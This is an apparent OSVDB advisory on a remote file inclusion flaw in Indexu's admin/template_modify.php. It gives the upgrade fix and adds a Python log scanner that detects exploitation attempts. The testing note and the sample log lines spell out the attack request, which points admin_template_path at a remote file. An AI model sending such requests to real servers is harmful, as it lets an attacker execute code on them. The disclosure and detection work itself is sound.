Indexu admin/template_modify.php admin_template_path Variable Remote File Inclusion

2006-06-16T00:00:00
ID OSVDB:39300
Type osvdb
Reporter OSVDB
Modified 2006-06-16T00:00:00

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'admin/template_modify.php' not properly sanitizing user input supplied to the 'admin_template_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Indexu admin/template_modify.php admin_template_path Variable Remote File Inclusion

Manual Testing Notes

http://[target]/indexu/admin/template_modify.php?admin_template_path=http://evilcode.txt?
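Added example (not part of the OSVDB record and not Indexu's own code): a small access-log check that flags requests to the script named above whose admin_template_path value is a URL or a traversal path, which is what the request in the testing note looks like from the server side. The log lines and the 203.0.113.0/24 and 198.51.100.0/24 addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined-log-format line: only the client IP, request target and status are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

VULN_SCRIPT = "admin/template_modify.php"   # script named in the advisory
VULN_PARAM = "admin_template_path"          # parameter named in the advisory

# A template path should be a relative name inside the template directory. A value that
# starts with a URL scheme or "//" (remote include, PHP stream wrappers) or that holds a
# ".." segment (traversal) points outside that directory and is reported.
BAD_VALUE_RE = re.compile(
    r'^(?:[a-z][a-z0-9+.-]*:)?//'
    r'|(?:^|[/\\])\.\.(?:[/\\]|$)', re.IGNORECASE)

def flag_request(target):
    """Return the offending admin_template_path value for a request target, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_SCRIPT):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM, []):
        value = unquote(value).strip()      # extra decode catches double-encoded values
        if BAD_VALUE_RE.search(value):
            return value
    return None

def scan_log(lines):
    """Return (client_ip, status, offending_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        bad = flag_request(m.group("target"))
        if bad is not None:
            hits.append((m.group("ip"), m.group("status"), bad))
    return hits

# Constructed sample access-log lines (documentation address ranges, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Jun/2006:10:22:01 +0000] "GET /indexu/admin/template_modify.php?admin_template_path=http://evilcode.txt? HTTP/1.1" 200 512',
    '203.0.113.9 - - [16/Jun/2006:10:23:40 +0000] "GET /indexu/admin/template_modify.php?admin_template_path=http%3A%2F%2F203.0.113.9%2Fs.txt%3F HTTP/1.1" 200 511',
    '198.51.100.2 - - [16/Jun/2006:10:25:12 +0000] "GET /indexu/admin/template_modify.php?admin_template_path=templates%2Fdefault HTTP/1.1" 200 2048',
    '198.51.100.3 - - [16/Jun/2006:10:26:00 +0000] "GET /indexu/index.php?cat=1 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, status, value in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} admin_template_path={value!r}")
```

A status of 200 on a flagged request is worth treating as a likely successful include, since the script returns normally after evaluating the fetched file.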

References:

Vendor URL: http://www.nicecoder.com/
Security Tracker: 1016330
Secunia Advisory ID: 18752
Related OSVDB IDs: 39355, 39351, 39353, 39346, 39347, 39350, 39345, 39344, 39341, 39336, 39332, 39323, 39315, 39311, 39307, 39303, 39301, 1018090, 39342, 39339, 39338, 39337, 39331, 39330, 39324, 39326, 39313, 39314, 39317, 39308, 39309, 39310, 39306, 39352, 39354, 39349, 39340, 39334, 39333, 39327, 39328, 39318, 39319, 39316, 39312, 39300, 39348, 39343, 39335, 39329, 39325, 39320, 39321, 39322, 39305, 39302, 39304
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html
ISS X-Force ID: 27262
CVE: CVE-2006-7017